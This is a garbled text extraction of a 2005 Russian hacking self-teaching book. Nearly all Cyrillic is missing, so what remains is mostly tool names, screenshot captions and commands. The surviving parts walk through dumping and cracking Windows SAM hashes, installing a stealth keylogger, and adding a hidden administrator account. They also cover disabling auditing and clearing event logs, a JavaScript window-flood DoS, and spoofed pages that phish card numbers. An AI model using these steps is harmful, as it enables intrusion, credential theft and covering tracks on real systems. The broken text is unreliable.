A Hacker's Self-Teaching Guide: detailed, illustrated...
TRANSCRIPT
-
5/28/2018
1/189
Alex Atsctoy
004.056.53(075.8) 32.973.20208781+32.973.2018.2781
Alex Atsctoy.
: . . .: [,] /Alex Atsctoy. .: , 2005. 192 .:. ISBN 5936730360.
CIP
? ,
, .
:www.3st.ruEmail:[email protected]
ISBN 5936730360 , 2005 , 2005 , 2005
1 . , , , , ,
. , , . , ( ).
, , .. , , 2 () . .
, :
log:
:
1: 2:
em: email
. , ! . 13.06.1999, .. .
!!!
, http://www.superinternetprovider.ru
, .
, , , , , , , , . , , ,
Web .
, . , . ,
, , ,
,
.
,
, .
, , ,
. ,
,
!
, , ,
.
, ,
. ,
80 ,
, ,
, ,
.
.
, ,
, , .
,
, , .
( ), .
(, !)
,
, .
, ,
, . , , , , , , . , ,
, , , , .
, . ,
. , ,
, , , , , .
, , , .
, , , , , .
20
. ? , , , , , , , , , (, )
, 10
. , , .
, ,
. ( ).
, :
(, . ).
, , , .
Hard DISK [ Fdisk.exe] n ( , ) .
! , , !
[ 24% ] , POWER !
IDE .
, . , ,
, , , , , HARD DISK , , , . , Must die, . Windows,
, .
, , . , Windows ? , , ? , , , , .
, ?
21 ().:
:
, , , , , . , .:
, . . , , , .
: . . , . . , , . .
: , .
, ?
, , ?
, ?
, .
, , ,
, , . . . . , , , (, ,
) . , :
, 16 19 .
( 80%)
, nerd.
: 1) , ; 2)
. (, ?
).
Windows Unix,
TCP/IP
, ,C++,Perl, Basic. ,
.
,
19 . ,
,
, , .
,
, , . , , , , .
, ,
, .
, , , . ,
. ,
,
, .
.
, ,
,
. ,
.
, , .
, ,
.. , .
,
,
. , 13
, ,
, .
, ,
,
,
.
, ,
:
.
,
. ,
, ,
, ,
,
[3]. , ,
, .
,
.
" ,
, ,
,
.
, .
,
, ,
. , , ,
.
, ,, ,
.
, . ,
, .
, , ,
.
,
,
(.. ,
). ,
, ,
, , ,
. , ,
, , ( rootkit ). U N I X , Windows 2000 , 4,
, , ,
, Windows, , . .
IP,
.
. , ,
, , ,
.
, 4
, ,
.
,
.
, , . ,
DoS ,
IDS.
.
,
.
, ,
, .
,
,
.
,
. ;
, .
,
, ,
, , .
, ,
,
. , [3]
,
. ,
, [3]
[1].
, (
). ,
, , . , , , , , . , . , , ,
. , . , ,
, . .
.
Web (, RIPE NCC http://www.ripe.net). Web, Whols, , , .
, , , Web. Yahoo(http://www.yahoo.com), Rambler(http://www.rambler.ru) . . , , , ,
. , , , [3]. Google(http://www.google.com), . , , C:\WINNT, Windows NT/2000. , .
, , Teleport Pro. , Web
, ., , HTML Web
, , HTTP . , , , , , ,
, , ( 11 ). , Web , , . , .
, , , . .
, , , , .. , , . SAM(Security Account Manager ), . SAM , 3 , , LOphtCrack LC4 (http://www.atstake.com)., , , , Windows , MS Office . , .
, 3 . Office Password 3.5(http://lastbit.com/download.asp) Windows , , .
Revelation SnadBoy(http://www.snadboy.com). , 18
***** ,
, Revelation .
, , , , , , . .
?, , , .
W e l o
. , Web, , .
, Web, Web,
Web , . Web 5 .
,
. , Web, .
. , , 6 Death & Destruction E mail Bomber . , . , , , 6 Brutus.
, , ICQ.
IP ICQ ( flood )ICQ , ! , 7 ICQ Flooder, I CQMu lt iV ar,
.
,
IP ICQ ICQ,
,
.
,
.
W e bWeb , , ,
DoS, .
, IIS 5 (Internet Information Server ) Microsoft
.
Web
, Web,
HTML
. 8
, , CGIScan
Brutus, IIS
. 9 , DoS.
Web ,
,
Web. , DoS
, , .
Web
, , CGI.,
, .
TCP/IP , , , , IP,
, . , .
10 SuperScan, foundstone_tools(http://www.foundstone.com).
W2R K (Windows 2000 Resource Kit Windo ws 2000), , W 2 H K (Windows2000HackerTools Windows 2000).
,
, , .
f le pe x& a m , , . , , , .
,
. , , .
. , , , , . SpyNet, .
, , VPN (Virtual PrivateNetwork ) , , . , , , ,
, .
, W2RK ( Windows 2000) W2HK Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP.
, , . , NTFS Windows 2000/XP, , ,
PGP Desktop Security.
11~ , , .. . Web ,
(., , http://www.securitylab.ru). 8 IIS. CGIScan
, . ,
,
, II S4. Web , .
,
, . .
,
; , , ( ). ,
, ,
, .
,
.
,
. 10 NetBUS,
. , .
,
, , .
.
, ,
. , ,
, , ... , , .
, , , ,
. ,
,
( ), ,
? , ,
,
, ?
, ?
, ,
( ),
, , ,
.
, .
. ,
, ,
,
. , , .
,
,
,
, .... , ,
Windows 2000/XP.
2 . W i n d o w s/Xf Windows 2000
TCSEC (Trusted Computer System Evaluation
Criteria ) . ,
Windows 2000, ,
.
.
.
.
.
.
, ,
, ,
, , .. ,
.
, ( log in ),
,
. , , ,
, .
Windows NT/2000/XP SAM (SecurityAccount Manager ). SAM
, ,
. SAM
, 3 . ,
.
,
, , .
,
, ,
. , , ,
.., , , ,
. , , , (, , ) ,, , .
,
, , , .
Windows NT 4 NTLM(NT LAN Manager NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager ),
, Windows
NTLM. Windows 2000/XP Kerberos, , ,
.
Windows 2000/XP,
Windows 2000 Kerberos.
,
Windows 2000/XP . , ,
, ,
.
,
, ,
.
.
Windows
, , ,
. ,
, .
, , ,
, ,
.
Windows 2000/XP , Windows NT/2000/XP .
, . ,
,
.
, , . ,
(Guest), , (User), .
, , ,
.
, (Administrators), ,
, ,
...
u r n,
, .
,
,
, ..
,
. , , . ,
, ,
, ,
.
Windows NT/2000/XP, , ,
.
, 4, ,
, .
,
, , , ,
, ,
.
,
11, , .
, , [2], [6],
,
Windows 2000/XP, , .
W in d o w s 2OOO/XP Windows 2000/XP SRM
(Security Reference Monitor ). SRM
Windows 2000/XP, .. .
Windows2000/XP , ,
SRM. .
LSA (Local Security Authority ),
,
, LSA.
, LSA
. , LSA
, .
SAM (Security Account Manager
),
.
, LSA.
AD (Active Directory ),
AD . ,
LSA. ,
, :
, ,
Kerberos;
, .
, , , :
, ,
Windows 2000/XP , /, .
SAM AD ,
LSA . ,
, , ..
, SRM., ,
Windows 2000/XP. , . ,
(SAM AD); ,
. ,
.
SAM, , , ,
. , ,
, SAM AD,
. SAM %%\5132\\5, AD %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , . ,
, , ,
, Windows2000/XP. SAM Windows NT 4 ,
NTLM , ,
,
LM,
Windows. LM , SAM
, , LOphtCrack
(http://www.atstacke.com) , .
LOphtCrack
SAM,
, , pwdump
(http://www.atstacke.com). Windows pwdump SAM
, LOphtCrack,
,
LM .
Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , , 34, . , 1 Microsoft,
Microsoft!
Windows. , , .
Windows 2000/XP , , , , , ? .
, , Windows, SID (SecurityIDentifier), 48 , . Win
dows2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List
), (Access Control Entries
). SID . ACL
Windows 2000/XP, , (Explorer) Windows,
Windows2000/XP. ACL.
Windows2000/XP (, ) LSA , SID
8 , ., , SRM 8 ACL , , . , , . ,
, ,
. ,
.
ACL
, Windows 2000/XP . , (
, http://www.rootkit.com). ,
ACL ,
,
?
, . ,
, Windows 2000/XP.
Windows NT 4 , .. , Windows 2000/XP ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server.
, ,
.
, , ,
, ADS ,
, ..
. , , IP .
ADS ,
, ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU
, .. OU
, OU .
Windows 2000/XP , .
,
.
Windows 2000 , ,
Windows 2000 Windows NT. ,
,
.
Windows 2000/XP , . ,
,
.
, ..
.
,
. , domen. : com* .domen, comp2.domen...
, ,
, ,domenl, domen2,... , ,
.
, domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ...compN.domen2.domen1. domenl domen2, forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .
Windows 2000/XP
, , :
.
(Universal group), , ,
.
(Global Group), , , .
(Local group domain), , .
ACL . . , , AD,
, , .
AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . ,, , Window 2000, . , , LC4
LOpghtCrack .
, , .
W i n d o w s2000 Windows 2000
, . ,
, , , . , , , [7], , . , ,
, . .
,
,
AD. ,
.
,
.
. ,
. ,
,
,
, ,
, .
, , ,. . , , ,
LM,
LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2( Service Pack 4 Windows NT 4)., , Windows 2000 Kerberos, ,
.
.
, Windows 2000/XP Windows
, LM. Windows 2000/XP Kerberos,
NTLM LM.34
Windows 2000/XP
TCP 88 ,
Kerberos, .
LM NTLM, LOphtCrack
.
, ,
. , ?
, , ,
.
, ,
. ,
. , , , .
,
.
,
, Windows 2000.
,
Microsoft ,
, . W i n d o w sXP
Windows.
Windows 2000/XP [7], . , ,
,
.
, , Retina,
[7].
,
. ,
, , VPN (Virtual Private
Network ). VPN ,
. VPN ,
.
, , , ,
(Bruce Schneier),
(Applied Cryptography), .
,
,
, .
, ..
.
Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, / ADS , Microsoft Press Windows 2000.
3 & Window 2000/XP, ,
, ,
, ? , 2,
,
,
,
. . ( ,
. .)
,
. ,
,
, ( ...).
, , . ,
, , ,
,
,
( ).
? ,
, .
.
, . ,
, .
, .
, ,
,
Windows. , ,
,
,
.
, , ,
(. 1), , . , , , .
, , , Windows BIOS . , Windows2000/XP .
,
(, ). , , MSDOS ! ,
. , BIOS , BIOS . .
, BIOS , NTFS, Windows2000/XP. , MSDOS , .
, , , ( , ! , . , , ),
Windows 2000/XP. NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MSDOS. , , Windows2000/XP
. , . NTFSDOSProfessional .
1515fro NTFSDOS Pro .
Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. . , FORMAT/SSYSMSDOS. Windows XP Create anMSDOS startup disk ( MSDOS).
> * NTFSDOS Professional(StartProgramsNTFSDOS Professional). (. 3.1).
wizard will help you install Windows NT/2000/XP system files needed NTFSDOS Professional to run from a MSDOS diskette or hard disk
PMC. 3.1. NTFSDOS Pro> Next ().
(. 3.2),
, .
> , Next (),
.
NTFSDOS Pro MS DOS
( 437).
(. 3.3) .
NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows NT/2000/XP installation or CDROM to your hard disk or a pair of floppy diskettes. If you wish to create bootable diskettes you must add MSDOS to the diskettes yourself, either before or after using this program. Use the FORMAT /S or SYS commands from a MSDOS shell to make bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the "Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create an MSDOS startup disk" option checked.
< Back Next > Cancel J. .2.
NTFSDOS Pro uses the character set for the United States version of MSDOS (code page 437) by default. Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab), code page 1361
Korean, code page 949
MSDOS Canadian French, code page 863
MSDOS Icelandic, code page 661
MSDOS Multilingual (Latin 1), code page 650
MSDOS Nordic, code page 865
MSDOS Portuguese, code page 86
MSDOS Slavic (Latin II), code page 852
< Back Next > Cancel
. ..
> Next(). NTFSDOS Pro(.3.4).
WindowsNT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 WindowsN T/2000/XP, Service Pack. Next ().
NTFSDOS Pro (. 3.5).
Pro uses copies of several files located in your Windows NT/2000/XPm directory. Specify the name of your Windows NT/2000/XP installation directory, or a directory containing the required
Windows NT/2000 system files. |c\ASFRool
floppy labelledNTFSDOSProfessional0
PressNextto copy filesID A:V
Next (), (. 3.7).
Copyingfilesto diskette...
Cancel
Puc. 3.7.
(. 3.7) Next
() . Windows XP
NTFSPRO.EXE
, NTFS .
Windows NT/2000 .
NTFSCHK.EXE,
NTFS.
(. 3.8)
NTFSDOS Professional.
necessary files have been copied. You may now reboot to MSDOS begin using NTFSDOS Professional Edition.
. .8. NTFSDOS Pro
> Finish (), .
NTFSDOS Pro,
. NTFSDOS
Pro . ,
, NTFSPRO.EXE,
NTFS . ,
, MSDOS ,
FAT FAT32,
NTFSDOS Pro .
MSDOS NTFS, Windows 2000/XP . ,
( ), , ,
. ,
, , ,
. ,
, , .
SAM,
, , _/132/1'|.
5 SAM, SAM.
NTFSDOS Pro, MSDOS SAM
/ K O p e H b _ C M C T e M b i / s y s t e m 3 2 / c o n f i g . , , LC4 LOphtCrack(http://www.atstake.com).
. 3.9 LC4 Import().
Import | Session | Help
Import From Local Machine
Import From Remote Registry...
Import From SAM File...
Import From Sniffer...
Import From .LC File...
Import From .LCS (LC3) File
Import From PWDUMP File...
I File* New Session ( * ). , . 3.9.
> Import I m p o r tFrom SAM File(* SAM). SAM.
> SAM, 13.
> (.3.10) SessionBegin Audit( ) .
?l@stakeLC4 (UnlilbdllFile View Import S e s t i o n Help .iu \ f t \ _u
lALEX3IALEX(ALEXlALEX3lALEX3lALEX3[ALEX3
AdministratorASPNETGuettH e l p A s s i t t a ntIUSH_ALEX3IWAM_ALEX3NewUzer
emptyempty empty emptyamply" empty
empty
e. ;Od Oh Qm usi a s
CS
mporled 7accounts
Puc. 3.10. SAM , , SAM,
. , .3.11, SAM.
A d n un i i t i a lo iASPNET
GuelHelpAti.tlonlIUSH.ALEX3IWAM.ALEX3NenUter
. 3.11. SAM ! , 007 , , ., , 5 Pentium 2 400 .
, LC4
.
LC4 AuditingOptions For This Session( ), .3.12.
Dictionary Crack / Enabled / Dictionary List
The Dictionary Crack tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack / Enabled / Characters to prepend / 3 Characters to append / Common letter substitutions (much slower)
The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys ". This test is fast and finds weak passwords.
Brute Force Crack / Enabled / Distributed / Character Set: A-Z and 0-9 / Custom Character Set
The Brute Force Crack tests for passwords that are made up of the characters specified in the Character Set. It finds passwords such as "WeR3pll6s" or "vC569t12b". This test is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords.
OK Cancel
Puc. 3.12. , LC4 :
Dictionary Crack ( ), DictionaryList ( ),
. LC4 , ,
. ,
, , , ,
.., .
Dictionary/Brute Hybrid Crack(/ ), , / , , .
Password???, .
Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) . Distributed () . File SaveDistributed ( ) .
LC4
Windows NT/2000/XP. Windows,
Windows 95/98, Pwltool.
'
Windows ,
, .
MS Office
(http://www.elcomsoft.com), OfficePassword 3.5. ,
, *******
Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows ,/,, , Window OfficePassword .
OfficePassword3.5 OfficePassword3.5 Lotus Organizer,MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicke n, MS O ffice Excel, Word, Access, Outlook, ZIP VB A, MS Office.
OfficePassword3.5 . Word password.doc, ?
Password Enter password to openfile\test\password.docII [OK 1CancelPuc . 3.13.
Word
, Windows, password.doc, (. 3.13).
, OfficePassword 3.5 :
OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).
> Select document MS O ffice.
I OfficePassword" D E M O "File Took Option* Help
1]Selecl document
You can also diaganddropfiles from nternetExplorer onto thiswindow.
>(c)19982001VitasRamanchauskas.LastBitSoftware
, .
> , Select recoverymode ( ), . 3.15.
Select recovery mode
Document path: C:\test\password.doc (Word)
Version: Word 8.0+
Internal version: 133
Word language: Russian (0419)
Encryption type: Strong
Text size: 537
Preview
Automatic
OfficePassword automatically selects most suitable recovery options. Recovery may take a lot of time (up to several months in case of a long password). About 80% of all passwords could be recovered within 48 hours. Use guaranteed recovery otherwise.
User-defined
Adjust settings to optimize search for specific case. (This option is for advanced users only.)
Guaranteed recovery
Success is guaranteed. Important: please read the documentation. Additional fee may apply. Click here to learn
Cancel |Display helpnfo NextPuc. 3.15,
> Select recovery mode ( ) :
Automatic ( ), , Next (), , .
Userdefined ( ), . .
Guaranteed recovery ( ), , , , .
>
Next
OfficePassword *DEMO*
Password found: '007' (without quotes)
The password has been copied onto the clipboard
Would you like to open the document now?
Yes No
Puc. 3.16. !
(). , ,
(.3.16). OfficePassword 3.5 , ,
. , .
,
,
.
, , 24 28
, . , , .
, ,
,
.
******, ,
, (,
), ,
******. , ,
, .
, , ,
. ,
.
,
,
. ,
, N e t B u s . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus
NetBus.
* SnadBoy'sRevelation
007
'CrcledV CursorDragto revealpassword | Check For Up dat e )| About Exit
Textol Window Under'Crcled V Cursor(l available) I Copy toclipboard
Status
Revelationactive.Length of available text: 3
iSWORD2000iMycq ^
Change Hoct"Hostinformation
Destination:|SWORD200Hostname/IP: 1.001
TCPport:Username:|AdmnstratorPassword:
Reposition Revelation out of the way when dragging 'circled +'
Always on top
When minimized, put in System Tray
Hide 'How to' instructions
How to
1) Left click and drag (while holding down the left mouse button) the 'circled +'
2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field under the cursor will be displayed in the 'Text of Window...' box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE: If the field contains text hidden by asterisks (or some other character), the actual text will be shown. In some cases the text may actually be asterisks.
NOTE: Not all of the fields that the cursor passes over will have text that can be revealed. Check the status light for availability of text.
Bright green: text available (see 'Length of text:' in Status area)
Bright red: no text available
Cancel
Puc. 3.17. NetBus Sword2000 !
Revelation . 'Circled+'Cursor ('+') SnadBoy'sRevelation ( . 3.17
Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( ) ) ( ). .3.17, 007 NetB us Sword2000, ( ). ( NetBus) [11]. , , , , . : .
, 4. , ,
, . , , ,
. , backdoor , , .
&* , , , , .
MSDOS: NET USER < > /ADD, , NETLOCALGROUP < > < > /ADD,
. . 3.18 .
Command Prompt
NewUser 00 /add
The command completed successfully.
C:\>net localgroup Administrators NewUser /add
The command completed successfully
Puc.3.18. NewUser
NewUser , , .
, , .
, .
Windows Startup Document and Settings ( ) , . Startup, All users, .
, , . , ( ) , . IKS (Invisible KeyLoggerStealth ), http://www.amecisco.com.
, . , , .
IKS http://www.amecisco.com, I n v i s i b l eKeyLogger 97 8 10 , .
Win do ws NT/2000/XP, , , 1 'l+ir^n+l0"8"]. IKS
W indows NT/200 0/ XP . , IK S , .
IKS . Webiks2k20d.exe , .3.19.
Standard Install | Stealth Install | Uninstall
It's recommended that you use Standard Install if this is your first time in using IKS. Just accept the defaults and click on "Install Now" button. Or you can click on "Read readme M" to get familiar with the concept of IKS first. During a standard installation a program directory will be created; program files will be placed in the directory. An icon to the log file viewer will be placed on the desktop. No file renaming (stealth features) will take place.
Install Directory
C:\Program Files\iks
You need to have administrator rights on this system for it to install successfully.
If you want to uninstall in the future, just run this program (ksinstall.exe) again, click on the "Uninstall" tab, then "Uninstall Now" to automatically uninstall the standard installation.
Read readme.M
. 3.19. IKS Install Now ( ) . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.
S et t in g s Help
0FlterOut Arrow KeysDFlterOut Ctrl and Alt KeysRtterOut F1 toF T 2KeysFilter Out All Other Function Keys
U seNotepad Translatet o Text Only
GearLa aClear Binary Log Upon Exit0dearText Log Upon Exit
Import Binary Log From:
SaveTextLogTo:C:\DOCUME~1\ADMINI~1.000\LOCALS I Browse,
Puc. 3.20.
Go! () , . . 3.20 , , .
, IKS
, . iks.sys K O p e H b _ C H C T e M b i / s y s t e m 3 2 / d r i v e r s , (
Regedt32 .3.21).R e g i s t r y E d i t o r [HKEY LOCAL MACHINE on Lo c nl M nchi
Registry Edit Tree View Security Opt i o ns Window HelpSGemuwaSGpc&I37DRIVERCEJIASICQ GroupwareCOIISADMINIPMkslCDILDAPQIMAP4D32GDIMonitor inetaccsCllnetln(o
Inport
Start:REG_DWORD:0x3Type: REG_DWORD:0 x1
Puc.3.21. Windows (,
The Clean er, ). IKS, Stealth Install( ) (.3.19)
, calc.sys, (, ).
IKS
. 007 StealthMonitor, Web,
, , . Win dows , , , notepad.exe.
, BIOS, .
, . , , . ,
, , , , ( ), , , .
, , .
Windows 2000/XP . Win do ws 9 x / M e , , PGPDesktop Security, . Windows 9x/Me ,
.
, , , , ? . .
4.
, ,
,
. , , , ,
, , , ,
. , , , , ,
.
,
. 1 ,
50%
,
, , .
, , ,
. ,
,
, ,
.
,
( ).
,
( ).
, . , , , , . .
, , ,
. , ,
,
. ,
privacy .
,
, , , ,
, ,
.
, [10],
(, )
, ,
privacy. ,
, , ,
, , , . .
, , ,
,
,
. ,
.
.
, . ,
, .
, , , ,
.
, .
. ,
Web
, Web
,
.
,
, ,
(,
).
,, , ,
. ,
? , ,
. :
, . , Web.
, .
,
.
Windows,
(Explorer) , .
,
Win do ws .
,
MS Office.
, , ,
.
?
, .
. ,
,
(Explorer) ,
. , (Delete) Windows , , .
W i n d o w s, , , , , MS Office.
, ,
(Show hidden files and folders)
(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).
)0 j | |j I
( .| | |
: " " ;D 0 0 ()Q
Q ,/ "
< 1 |
OK I 1I. 4.1.
Word (Delete) Windows , . . 4.2, , Word, , , .
^3 IQPGP
g SecurityI ; DatabaseLSJ I
rf 3.5 (:)& (:)(D:)
: 10 (50 ||
3PGPI]Security5| 5 0 ~ $ . d o c
|~WRL0002.tmp_ ~ W R U > 0 0 4 . t m p|~WRL1120.tmp~WRL19B2.tmp|~WRL3531.tmp
Puc. 4.2. ,
, . , .WB K, 60
, ~$. , , , Windows, , , Win do ws . , , , . ?
, MS Office, , , , Norton Utilities. Cleaner Disk Security (http://www.theabsolute.net/sware/index.html#Clndisk) . , , , . , . ,
, . , , . ( 100%) .
. 4.3 Clean Disk Security 5.01 (http://www.theabsolute.net/sware/index.html#Clndisk),
,
( ).
Clean Disk Security 5.01
Erasefully ( ).
, , (
. 4.3. Clean Disk Security 5.01
FAT NTFS). ,
, .
Windows, Windows,
Temp ( , ,
)
. ,
, , (cookie).
,
(. 4.3).
. 4.3, :
Simple () 6 ,
.
; 1 .
NIS 7
(.. ) .
Gutmann 35 (.. ).
(Peter Gutmann)
. .
,
( ).
Test mode ( ) #10
ASCII.
. , Clean Disk Security 5.01
, ,
.
, [10]. , :
(UPS);
. , , .
,
.
, , .
, ,
. ,
,
, .
,
. ,
, , Norton Util ities,
, / , .
, ,
[10]. ( )
, ,
regedt32.
. ,
,
NTFS.
, ,
,
. ,
Web
.
, , . .
, ,
.
& , ,
.
. ,
.
, . (). , ,
, .
( Web, , , ), , , , . , , .
(., [5],[10], , , ). , ,
. , , , . , .
, , . .
, . , , ,
. ,
, , , , . , , Web ,
. HTML Web. Web , , Web, .
,
, Web http://www.privacy.net/analyze, , Web . . 4.4, , Web, .
3lAnalyze YourInternetPrivacy Microsoft Internet Explorer^^ ^ ~ BBSBBBgg ** ^
Your Browser Type and Operating System:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All information sent by your web browser when requesting this web page:
Accept: */*
Accept-Language: ru
Connection: keep-alive
Host: www.privacy.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
Cookie: Date=1/30/2002; Privacy.net=Privacy+Analysis
Via: 1.1 cea15. 1.1 proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3)
X-Forwarded-For: 212.9.232.151, 212.9.224.89
Cache-Control: max-age=259200
a _ . 4.4. W eb
, ( )
Whols, 1, .
, , IP . Web Web , IP
...
, , Web, ( a n o n ym i z e r ). , Web, ,
. , , http://www.anonymizer.com.(. 4.5).
Anonymiz er.com Onlinu Privacy Sorvic4 1 | U [ ifer
hup.//ww wanonymteBf.coin.Anonymizer.com(|AboutPrivacy
FINDITSTO spyCap ' :. 4.5. Web
Go.
, FTP, , , . , , ,
Web, , . ( ), .
Web , (Proxy server)
(. 4.6).
' " . ,
D
Q
0 : |www.anonymize| ; J8080 [...D
:::
111
|
. 4.6.
, , ,.. Web , .
.
HTTP, FTP, Web, FTP.
, .
.
. , , , Web, ,Yahoo. proxy+server+configuration+Explorer, Web, , . , , .
, , , , , , , . , , ,
3 IKS. , , N e t B u s(http://www.netBus.org). , , , , , .
:
, ( ).
IP , , .
, , . , Back Orifice 2000 31337 , , 31336, , , .
,
Windows NT/2000/XP. , auditpol W2RK, , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm) . (Event Viewer) Windows 2000/XP.
, , (Hidden). Win do ws , .
, .
, 68
, , explorer.exe, Windows
Windows.
, EliteWrap,
[11].
( Rootkit ).
,
,
.
.
Tripwire (http://www.tripwiresecurity.com), , Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].
, ,
,
, .
,
/ . Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, .
:
C:\Auditpol>auditpol \\ComputerName /disable
Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
System = No
Logon = No
Object Access = No
Privilege Use = No
Process Tracking = Success and Failure
Policy Change = No
Account Management = No
Directory Service Access = No
Account Logon = No
//ComputerName , /disable . auditpol.exe , , , , ( auditpol /?
).
Windows2000/XP :> (Start)
(Settings Control Panel).File Action View Help
Eve nt Viewer[Local]I T y p eIDescription ISire
Application ErrorR e c o r d 512...
Delete all recordsnthe log
Puc. 4 .7 . Windows
(Control Panel) (Administrative Tools).
(Event Viewer). Event Viewer ( ) (. 4.7).
(Security Log);
. Clear all Events ( ).
, . 4.8, .
Do you want to save "Security" before clearing it? Yes No Cancel
Puc. 4.8. > (No), . .
, ! ,
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm) . , ,
Windows NT 4, Windows 2000. .
C:\els004>elsave s \\ComputerName s , . , . elsave /? , .
, elsave.exe . elsave.exe
W in dows ( (Start), AT MSDOS).
System, .71
( , ).
, ,
. , , ,
, .
! 50%
( !)
,
,
[9].
, , Norton Personal Firewall, PGP Desktop Security .
,
,
, .
5 # , , , ,
. , , , , , .
, 90 , . , , .
, , , .
, , , TCP/IP.
, .
, , . ,
.
, , ,
(, ).
, . , , , , Word .., , , , .
WWW (World Wide Web ), Web (). Web , Web . 1961 , Web 1992 .
, ,
. Web
Web ,
, Web.
Web .
Web,
Web URL (UniformResource Locator ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol ).
, Web,
HTML (Hyper Text Markup Language
).
, ,
,
HTML CGI HTTP.
Web ,
,
Web, ,
,
,
1 Web
.
Web , ,
Web HTML Web,
( browser, ,
, ), Web Web.
HTML Web,
Web,
, , , ,
, , , , .
, HTML
, Web, , Inter
net Explorer(ff i) Netscape Navigator(NN).74
Web
: Web , HTML Web , , ,
HTML, , Web? HTML?
. ( ) , , Web.
, DoS , Web . , , Web, , .
open ( ), JavaScript M a i nP a g e .h tm l
, HTML 8.1. 8.1. HTML Web
<SCRIPT LANGUAGE="JavaScript">
generation();
function generation() {
  var d = 0;
  // Loops without end, opening a new 250x250 window on each pass
  while (true) {
    a = new Date;
    d = a.getMilliseconds();
    window.open("MainPage.html", d, "width=250,height=250");
  }
}
</SCRIPT>
HTML, , . Windows2000/XP IE 5 IE 6 HTML, .
IE 5 IE 6
.
tlep
. , 8.2
... (
).
8.2. HTML Web
var p=external....;
HTML 8.2 IE 5 6
var p 8.2.
( [3], [10])., ,
HTML .
[3] HTML,
CLSID. 8.3. HTML, .
8.3. HTML
8.3 IE 6 ,
. 5.1.
WebJQC:\Documenl.andSelling*\Alex4M>DocuroenUSWorkD...[)11
. 5.1. HTML C:\Windows\system32\calc.exe,
, .
Web , JavaScript, HTML Web, . , IFRAME, Web .
8.4 HTML, , C:\security.txt. 8.4. Web_
C:\security.txt
alert(" :\n"bdocumentbody nnerText;77
II.navigate("file://:/Security.txt");setTimeout('Il.navigate(nfile://C:/Security.txt")',1000);
8.4 IE 5 IE 6
,
. 5.2.
. 5.2,
security.txt Web.
,
,
, JavaScript
.
Web
QMd0File Edit View Favorite* Tools Help C:\security.txt
. 5.2. Web
NavigateComplete2, [3]. Webcaumo& Web
, , ,
Web
. ,
Web ActiveX, .
,
,
, , ,
, ,
..
, ,
. ,
.
Web
, Web, . , , .
, Web . , Win dows Web Microsoft
NetBus.
Web, . Web , . 8.7 HTML, .
8.7. HTML
Bubliki&Baranki
function falsify(){z=window.open("about:Internet Bubliki&Baranki "); document.open();z.document.write ("
Bubliki&Baranki VirtualAir,
! , Bubliki&Baranki< / H T M L > 8.7 IE 5 ,
. 5.3.
h t t p : / / w w w . B u b l i k i & B a r a n k i . c o r n Rog&Kopito . Web Rog&Kopito
Bubliki&Baranki, Web Rog&Kopito .(, , .) ,
Web Bubliki&Baranki. Web, . 5.4.
Web . 5.4
.
VirtualAir
&;1 V u t u a l A i r , ! ,. Bublild&Baranki
. 5.3. Web Rog&Kopito
. 5.4. / VirtualAir Bubliki&Baranki
CGI GetCardNumber, Web, Rog&Kopito:
, .
.
,
,
.
Web, , . :
. , ,
SSL.
Web
.
.
,
, ,
. .
,
. ,
, ,
,
. .
Web .
,
. ,
, ,
,
Web . , Web
, , , , .
, ,
4 IE Netscape, , 5 6
.
, , .
6. , ,
, , , .
, . , , . , , , , , ... , !
(, , , 1, ). , , , , . ? .
( Flood ,) ( Spam , . Spam ). (.. ), , ,
. ,
SMTP.
Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . , DnD, . Avalanche Avalanche
DnD, . .6.1 DnD 4.O.
